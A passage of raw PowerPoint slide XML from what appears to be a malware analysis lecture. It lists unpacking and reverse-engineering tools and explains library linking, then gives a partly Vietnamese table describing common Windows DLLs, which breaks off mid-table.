              <a:t>PEview</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>, Resource Hacker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="491173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Unpacking</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0021595"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="457200" y="1196975"/>
          <a:ext cx="8229600" cy="5111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Up Arrow 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1331640" y="4437112"/>
            <a:ext cx="504056" cy="864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24554" y="5548590"/>
            <a:ext cx="1718227" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>OllyDbg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>/IDA Pro</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3563888" y="5548590"/>
            <a:ext cx="2012089" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Plugin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>OllyDumpEx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Up Arrow 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4317904" y="4492534"/>
            <a:ext cx="504056" cy="864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Up Arrow 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7380312" y="4461003"/>
            <a:ext cx="504056" cy="864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7039613" y="5574729"/>
            <a:ext cx="1185453" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>ImportREC</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2901627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Linked Libraries and Functions</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Code libraries can be linked statically, runtime, or dynamically.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Knowing how the library code is linked is critical to our understanding of malware because information that we can find in PE file header depends on how the library code has been linked.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Static linking: all code of linked library is copied to the executable.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Runtime linking:  link to the corresponding library when the function needed.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Dynamic linking:  the host OS searches for the necessary libraries when the program is loaded.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3808644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Libraries and Functions</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Exploring Dynamically Linked Function with Dependency Walker</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB"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124744"/>
            <a:ext cx="9085707" cy="5690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2683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DLLs</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="4" name="Table 3"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1981791402"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="251520" y="1124745"/>
          <a:ext cx="8712968" cy="5637397"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="2360618"/>
                <a:gridCol w="6352350"/>
              </a:tblGrid>
              <a:tr h="370450">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" b="1" dirty="0" smtClean="0">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>DLL</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="1600" b="1" dirty="0">
                        <a:effectLst>
                          <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                            <a:srgbClr val="000000">
                              <a:alpha val="43137"/>
                            </a:srgbClr>
                          </a:outerShdw>
                        </a:effectLst>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GB" sz="1600" b="1" dirty="0" smtClean="0">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>Description</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="1600" b="1" dirty="0">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828">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" i="1" dirty="0" smtClean="0"/>
                        <a:t>Kernel32.dll</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="1600" i="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sz="1600" dirty="0" err="1" smtClean="0"/>
                        <a:t>Chứa</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>các</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>hàm</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>chức</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>năng</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>là</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>nhân</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>của</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> HĐH </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>như</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>truy</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>cập</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>và</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>thao</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>tác</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>với</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>bộ</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>nhớ</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>, file </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>và</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>phần</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>cứng</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="16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828">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" i="1" dirty="0" smtClean="0"/>
                        <a:t>Advapi32.dll</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="1600" i="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sz="1600" dirty="0" err="1" smtClean="0"/>
                        <a:t>Cung</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" dirty="0" err="1" smtClean="0"/>
                        <a:t>cấp</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>chức</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>năng</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>truy</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>cập</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>đến</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>nhân</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>của</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> HĐH (</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>nâng</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>cao</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>) </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>như</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>quản</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>lý</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>dịch</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>vụ</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>và</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>thanh</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>ghi</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="16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828">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" i="1" dirty="0" smtClean="0"/>
                        <a:t>User32.dll</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="1600" i="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sz="1600" dirty="0" err="1" smtClean="0"/>
                        <a:t>Chứa</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>các</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>giao</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>diện</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>người</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>dùng</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>như</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> button, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>thanh</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>cuộn</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>các</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>tương</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>tác</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>với</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>người</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>dùng</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="16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4195">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" i="1" dirty="0" smtClean="0"/>
                        <a:t>Gdi32.dll</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="1600" i="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sz="1600" dirty="0" err="1" smtClean="0"/>
                        <a:t>Chứa</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>các</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>hàm</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>hiển</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>thị</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>và</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>xử</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>lý</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>đồ</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>họa</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="16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46734">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
